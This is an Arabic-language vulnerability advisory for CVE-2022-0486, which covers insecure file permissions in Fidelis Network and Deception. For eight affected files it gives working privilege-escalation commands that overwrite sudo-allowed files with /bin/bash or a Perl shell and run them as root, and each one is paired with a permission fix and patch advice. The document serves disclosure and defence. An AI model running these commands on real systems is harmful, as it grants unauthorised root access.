
Fidelis Network and Deception - تصعيد الامتيازات بسبب صلاحيات الملفات غير الآمنة - متعدد
تمت الموافقة على جميع أدوات الاستغلال للنشر العام من قبل حكومة الولايات المتحدة. شكر خاص للعسكريين والموظفين الحكوميين المسؤولين عن الموافقة على الوثائق للتوزيع غير المحدود. يُرجى الرجوع إلى أرقام OTR التالية:
التاريخ: 20220517 2005H UTC
مؤلف الاستغلال: Henry Reed، The Aerospace Corporation
الصفحة الرئيسية للبائع: https://fidelissecurity.com/
الإصدارات المتأثرة:
تم الاختبار على:
CVE: CVE-2022-0486
وصف CVE: تؤدي صلاحيات الملفات غير السليمة في مكونات CommandPost وCollector وSensor وSandbox في شبكة Fidelis والتضليل إلى تمكين المهاجم الذي لديه صلاحيات إدارة محلية على واجهة سطر الأوامر من تعديل الملفات المتأثرة وتمكين تصعيد الامتيازات المكافئة للمستخدم الجذر. توجد الثغرة في إصدارات شبكة Fidelis والتضليل السابقة عن 9.4.5. تتوفر التصحيحات والتحديثات لمعالجة هذه الثغرة.
توجد العديد من أدوات الاستغلال ضمن هذه الـ CVE، حيث تغطي الـ CVE سلسلة من صلاحيات الملفات غير السليمة. جميع أدوات الاستغلال ناتجة عن منح صلاحية NOPASSWD واحدة والعديد من صلاحيات sudoers التي تتطلب كلمة مرور لمستخدم fidelis على ملفات ثنائية أو نصوص برمجية يملكها مستخدم fidelis، وبالتالي السماح لمستخدم fidelis بتعديل الملف بشكل تعسفي. وهذا يسمح بتصعيد الامتيازات محلياً.
الملف المتأثر بدون كلمة مرور:
الملفات المتأثرة التي تتطلب كلمة مرور:
يُوصى لمستخدمي Fidelis Deception أو Fidelis Network المتأثرين بتحديث برامجهم لتصحيح هذه الثغرة. يُوصى أيضاً لجميع المستخدمين، بغض النظر عما إذا كانوا متأثرين بهذه الثغرة أم لا، بتعطيل الوصول إلى الصدفة لمنتجات Fidelis الخاصة بهم بعد التهيئة الأولية.
إذا لم يكن أي من هذين الإجراءين ممكناً لسبب ما، يتم وصف إجراء تخفيف لكل ملف ضعيف في هذا المستند. بناءً على اختبار المؤلف، يبدو أن المستخدمين سيحتاجون إلى استخدام إحدى هذه الثغرات لتصعيد الامتيازات قبل أن يتمكنوا من تطبيق إجراءات التخفيف الموصوفة، لذا يُوصى بشدة بتحديث Fidelis وتعطيل SSH بدلاً من ذلك.
تم الاختبار على:
تسمح صلاحيات الملكية غير الصحيحة على /FSS/bin/shutdown.pl لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/bin/shutdown.pl كمستخدم جذر دون المطالبة بكلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل البرنامج النصي بشكل تعسفي وتصعيد الامتيازات.
$ chmod 700 /FSS/bin/shutdown.pl
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
$ sudo /FSS/bin/shutdown.pl
لقطة شاشة توضح اكتشاف الثغرة واستغلالها. لاحظ سطر NOPASSWD الذي يشير إلى أن shutdown.pl مرشح محتمل لتصعيد الامتيازات:

تغيير مالكي المستخدم والمجموعة لـ /FSS/bin/shutdown.pl إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/bin/shutdown.pl من شأنه تخفيف هذه الثغرة:

تم الاختبار على:
تسمح صلاحيات الملكية غير الصحيحة على /FSS/setup/cert_mgmt لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/setup/cert_mgmt كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل البرنامج النصي بشكل تعسفي وتصعيد الامتيازات.
$ chmod u+w /FSS/setup/cert_mgmt
$ cp /bin/bash /FSS/setup/cert_mgmt
$ sudo /FSS/setup/cert_mgmt
لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تغيير مالكي المستخدم والمجموعة لـ /FSS/setup/cert_mgmt إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/setup/cert_mgmt من شأنه تخفيف هذه الثغرة:

تم الاختبار على:
تسمح صلاحيات الملكية غير الصحيحة على /FSS/bin/db_updater لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في Fidelis CommandPost. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/bin/db_updater كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل الملف الثنائي بشكل تعسفي وتصعيد الامتيازات.
$ chmod u+w /FSS/bin/db_updater
$ cp /bin/bash /FSS/bin/db_updater
$ sudo /FSS/bin/db_updater

تغيير مالكي المستخدم والمجموعة لـ /FSS/bin/db_updater إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/bin/db_updater من شأنه تخفيف هذه الثغرة:

تم الاختبار على:
تسمح صلاحيات الملكية غير الصحيحة على /FSS/deception-manager/bin/deception-manager لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في Fidelis CommandPost. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/deception-manager/bin/deception-manager كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل الملف الثنائي بشكل تعسفي وتصعيد الامتيازات.
$ cp /bin/bash /FSS/deception-manager/bin/deception-manager
$ sudo /FSS/deception-manager/bin/deception-manager
لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تغيير مالكي المستخدم والمجموعة لـ /FSS/deception-manager/bin/deception-manager إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/deception-manager/bin/deception-manager من شأنه تخفيف هذه الثغرة:

تم الاختبار على:
تسمح صلاحيات الملكية غير الصحيحة على /FSS/sbin/fssdbg.sh لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/sbin/fssdbg.sh كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل البرنامج النصي بشكل تعسفي وتصعيد الامتيازات.
$ chmod u+w /FSS/sbin/fssdbg.sh
$ cp /bin/bash /FSS/sbin/fssdbg.sh
$ sudo /FSS/sbin/fssdbg.sh
لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تغيير مالكي المستخدم والمجموعة لـ /FSS/sbin/fssdbg.sh إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/sbin/fssdbg.sh من شأنه تخفيف هذه الثغرة:

تم الاختبار على:
تسمح صلاحيات الملكية غير الصحيحة على /FSS/bin/mst لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/bin/mst كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل الملف الثنائي بشكل تعسفي وتصعيد الامتيازات.
$ chmod u+w /FSS/bin/mst
$ cp /bin/bash /FSS/bin/mst
$ sudo /FSS/bin/mst
لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تغيير مالكي المستخدم والمجموعة لـ /FSS/bin/mst إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/bin/mst من شأنه تخفيف هذه الثغرة. فيما يلي لقطة شاشة توضح تخفيف تصعيد الامتيازات ومقتطف من إخراج أمر mst عند تشغيله بواسطة fidelis بدون sudo:

لقطة شاشة توضح أنه حتى مع التخفيف، لا يزال بإمكان مستخدم fidelis تشغيل الأمر كـ sudo:

لقطة شاشة توضح أنه لا يمكن تعديل mst لتشغيل كود تعسفي آخر عند استخدام التخفيف:

تم الاختبار على:
تسمح صلاحيات الملكية غير الصحيحة على /FSS/bin/setup لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/bin/setup كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل الملف الثنائي بشكل تعسفي وتصعيد الامتيازات.
$ chmod u+w /FSS/bin/setup
$ cp /bin/bash /FSS/bin/setup
$ sudo /FSS/bin/setup
لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تغيير مالكي المستخدم والمجموعة لـ /FSS/bin/setup إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/bin/setup من شأنه تخفيف هذه الثغرة:

تم الاختبار على:
تسمح صلاحيات الملكية غير الصحيحة على /FSS/setup/unlock_cp_user.sh لمستخدم fidelis بتصعيد الامتيازات المكافئة للمستخدم الجذر في العديد من منتجات Fidelis. بشكل افتراضي، يسمح تكوين sudoers لمستخدم fidelis بتنفيذ /FSS/setup/unlock_cp_user.sh كمستخدم جذر إذا تم توفير كلمة مرور. الملف مملوك لمستخدم fidelis، مما يسمح لمستخدم fidelis بتعديل البرنامج النصي بشكل تعسفي وتصعيد الامتيازات.
$ chmod u+w /FSS/setup/unlock_cp_user.sh
$ cp /bin/bash /FSS/setup/unlock_cp_user.sh
$ sudo /FSS/setup/unlock_cp_user.sh
لقطة شاشة توضح اكتشاف الثغرة واستغلالها:

تغيير مالكي المستخدم والمجموعة لـ /FSS/setup/unlock_cp_user.sh إلى root:fidelis والسماح فقط بصلاحيات القراءة والتنفيذ لمالك المجموعة لـ /FSS/setup/unlock_cp_user.sh من شأنه تخفيف هذه الثغرة:
